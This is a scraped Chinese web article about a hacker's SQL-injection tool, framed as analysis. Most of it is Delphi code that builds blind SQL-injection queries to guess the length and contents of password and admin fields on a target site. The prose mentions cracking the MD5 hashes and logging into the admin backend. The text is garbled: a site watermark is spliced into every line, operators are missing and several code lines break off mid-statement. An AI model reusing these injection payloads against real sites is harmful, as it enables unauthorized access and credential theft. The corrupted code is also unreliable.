上图只是对一个网站注入点的工具检测,当然看到了结果扫出来的密码为16位的md5加密码,但我们可以通过md5密码破解工具进行破解的。然后找到后台用所得的用户" />
网络安全 当前位置:首页 > 计算机学习 > 网络知识 > 网络安全>正文

黑客的脚本漏洞工具分析(图)

【网络安全】 2017-07-19本文已影响
LxE秒教学习网-学习教育资源分享平台
LxE秒教学习网-学习教育资源分享平台
上图只是对一个网站注入点的工具检测,当然看到了结果扫出来的密码为16位的md5加密码,但我们可以通过md5密码破解工具进行破解的。然后找到后台用所得的用户名和密码进行登录即可。对于黑客软件,其实并不是我们想象的那么复杂,只是根据掌握的漏洞信息提交相应该的数据罢了,我们看下下面一段用delphi写的注入的片段就清楚不过了。这里控件的设置和线程的创建略,我们主要是看看猜解的过程,如下:LxE秒教学习网-学习教育资源分享平台
procedure TMainForm.GuessContProc(ListInt: integer); { SQL注入 - 多线程猜解字段内容 }LxE秒教学习网-学习教育资源分享平台
function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;LxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
Result := Url ’ and exists(select * from ’ TableName ’ where len(’ FieldName ’)’ LevelStr IntToStr(Len) ’ and id=(Select max(id) From ’ TableName ’ where id in (select top ’ TOPStr ’ id from ’ TableName ’ Order by id)))’LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
varLxE秒教学习网-学习教育资源分享平台
TableName: string;LxE秒教学习网-学习教育资源分享平台
FieldName, S: string;LxE秒教学习网-学习教育资源分享平台
ContentInt: integer;LxE秒教学习网-学习教育资源分享平台
i, Len, LengthInt, N: integer;LxE秒教学习网-学习教育资源分享平台
GridCount: integer;LxE秒教学习网-学习教育资源分享平台
Colu: TColumn;LxE秒教学习网-学习教育资源分享平台
FlagBool: boolean;LxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
Len := 0;LxE秒教学习网-学习教育资源分享平台
LengthInt := 0;LxE秒教学习网-学习教育资源分享平台
FlagBool := True;LxE秒教学习网-学习教育资源分享平台
TableName := TableNameLst.Items[TableNameLst.Itemindex];LxE秒教学习网-学习教育资源分享平台
FieldName := Memo2.Lines[ListInt];LxE秒教学习网-学习教育资源分享平台
if (LowerCase(FieldName) = ’password’) or (LowerCase(FieldName) = ’pass’) orLxE秒教学习网-学习教育资源分享平台
(LowerCase(FieldName) = ’admin_pass’) or (FieldName = ’密码’) orLxE秒教学习网-学习教育资源分享平台
(LowerCase(FieldName) = ’userpassword’) or (LowerCase(FieldName) = ’passwd’) thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, 16), 800);LxE秒教学习网-学习教育资源分享平台
if ContentInt >= and1Num thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
SqlResultMemo.Lines.Add(FieldName ’长度: 16’);LxE秒教学习网-学习教育资源分享平台
LengthInt := 16LxE秒教学习网-学习教育资源分享平台
endLxE秒教学习网-学习教育资源分享平台
elseLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
while (Len LxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
application.ProcessMessages;LxE秒教学习网-学习教育资源分享平台
inc(Len, 2);LxE秒教学习网-学习教育资源分享平台
Pane1.Caption := ’正在检测长度:Len(’ FieldName ’)=’ inttostr(Len);LxE秒教学习网-学习教育资源分享平台
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’LxE秒教学习网-学习教育资源分享平台
if ContentInt >= and1Num thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
for N := Len - 1 to Len doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);LxE秒教学习网-学习教育资源分享平台
if ContentInt >= and1Num thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
LengthInt := N;LxE秒教学习网-学习教育资源分享平台
SqlResultMemo.Lines.Add(FieldName ’长度: ’ inttostr(N));LxE秒教学习网-学习教育资源分享平台
FlagBool := False;LxE秒教学习网-学习教育资源分享平台
Break;LxE秒教学习网-学习教育资源分享平台
end; // ifLxE秒教学习网-学习教育资源分享平台
end; // forLxE秒教学习网-学习教育资源分享平台
end; // ifLxE秒教学习网-学习教育资源分享平台
end; // whileLxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
endLxE秒教学习网-学习教育资源分享平台
elseLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
while (Len LxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
application.ProcessMessages;LxE秒教学习网-学习教育资源分享平台
inc(Len, 2);LxE秒教学习网-学习教育资源分享平台
Pane1.Caption := ’正在检测长度:Len(’ FieldName ’)=’ inttostr(Len);LxE秒教学习网-学习教育资源分享平台
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’LxE秒教学习网-学习教育资源分享平台
if ContentInt >= and1Num thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
for N := Len - 1 to Len doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);LxE秒教学习网-学习教育资源分享平台
if ContentInt >= and1Num thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
LengthInt := N;LxE秒教学习网-学习教育资源分享平台
SqlResultMemo.Lines.Add(FieldName ’长度: ’ inttostr(N));LxE秒教学习网-学习教育资源分享平台
FlagBool := False;LxE秒教学习网-学习教育资源分享平台
Break;LxE秒教学习网-学习教育资源分享平台
end; // ifLxE秒教学习网-学习教育资源分享平台
end; // forLxE秒教学习网-学习教育资源分享平台
end; // ifLxE秒教学习网-学习教育资源分享平台
end; // whileLxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
GuessLsv.Clear;LxE秒教学习网-学习教育资源分享平台
if Len >= 50 thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
sql_EdUrl.Enabled := True;LxE秒教学习网-学习教育资源分享平台
Sql_GuessTable.Enabled := True;LxE秒教学习网-学习教育资源分享平台
TableNameLst.Enabled := True;LxE秒教学习网-学习教育资源分享平台
FieldNameLst.Enabled := True;LxE秒教学习网-学习教育资源分享平台
application.MessageBox(’列名长度大于50,猜解失败!’, ’提示’, 32);LxE秒教学习网-学习教育资源分享平台
Exit;LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
Pane1.Caption := ’正在检测’ FieldName ’的内容...’;LxE秒教学习网-学习教育资源分享平台
GuessLsv.Update;LxE秒教学习网-学习教育资源分享平台
if LengthInt = 5 thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
ContentInt := Get_HttpSize(Sql_EdUrl.Text ’ and exists (select top ’ sqlEdTop.Text ’ ’ FieldName ’ from ’ TableName ’ where instr(’ FieldName ’,’’admin’’)=1 and len(username)=5)’);LxE秒教学习网-学习教育资源分享平台
if ContentInt >= and1Num thenLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
s := ’admin’;LxE秒教学习网-学习教育资源分享平台
for i := 1 to 5 doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
application.ProcessMessages;LxE秒教学习网-学习教育资源分享平台
with GuessLsv.Items.Add doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
caption := ’第’ inttostr(i) ’位’;LxE秒教学习网-学习教育资源分享平台
SubItems.Add(s);LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
sleep(60);LxE秒教学习网-学习教育资源分享平台
GuessLsv.Update;LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
inc(SQL_ScanContent_ThreadCreateCount);LxE秒教学习网-学习教育资源分享平台
StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount - 1, 1] := ’admin’;LxE秒教学习网-学习教育资源分享平台
StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount, 1] := ’检测中...’;LxE秒教学习网-学习教育资源分享平台
SqlResultMemo.Lines.Add(FieldNameLst.Items[FieldNameLst.Itemindex] ’内容:admin’);LxE秒教学习网-学习教育资源分享平台
if SQL_ScanContent_ThreadCreateCount LxE秒教学习网-学习教育资源分享平台
GuessContProc(SQL_ScanContent_ThreadCreateCount - 1);LxE秒教学习网-学习教育资源分享平台
Exit;LxE秒教学习网-学习教育资源分享平台
endLxE秒教学习网-学习教育资源分享平台
elseLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
for i := 1 to LengthInt doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
application.ProcessMessages;LxE秒教学习网-学习教育资源分享平台
with GuessLsv.Items.Add doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
caption := ’第’ inttostr(i) ’位’;LxE秒教学习网-学习教育资源分享平台
SubItems.Add(’检测中’);LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
sleep(30);LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
endLxE秒教学习网-学习教育资源分享平台
elseLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
for i := 1 to LengthInt doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
application.ProcessMessages;LxE秒教学习网-学习教育资源分享平台
with GuessLsv.Items.Add doLxE秒教学习网-学习教育资源分享平台
beginLxE秒教学习网-学习教育资源分享平台
caption := ’第’ inttostr(i) ’位’;LxE秒教学习网-学习教育资源分享平台
SubItems.Add(’检测中’);LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
sleep(30);LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
end;LxE秒教学习网-学习教育资源分享平台
从上面的代码中,我们可以看出,黑客软件只是代替了手工操作,通过多线程更进一步提高了猜解的速度,但猜解的表和字段还得我们自己设定,然后通过post提交我们设定的格式(其中url中的 是空格的意思,因为在网址后面执行相应的sql语句时都要有相应的空格),按照我们设定的表和字段猜解出相应的用户名和密码内容。LxE秒教学习网-学习教育资源分享平台

本站所有资源均来自于秒教学习网蜘蛛爬取结果,如您发现侵权、违法、存在不和谐内容,告知本站一律删除

本站不以盈利为目的,全站资源仅供学习爱好使用。本站站长邮箱:3569622@qq.com

备案号:

©秒教学习网  2016-2019版权所有     站点地图

回到顶部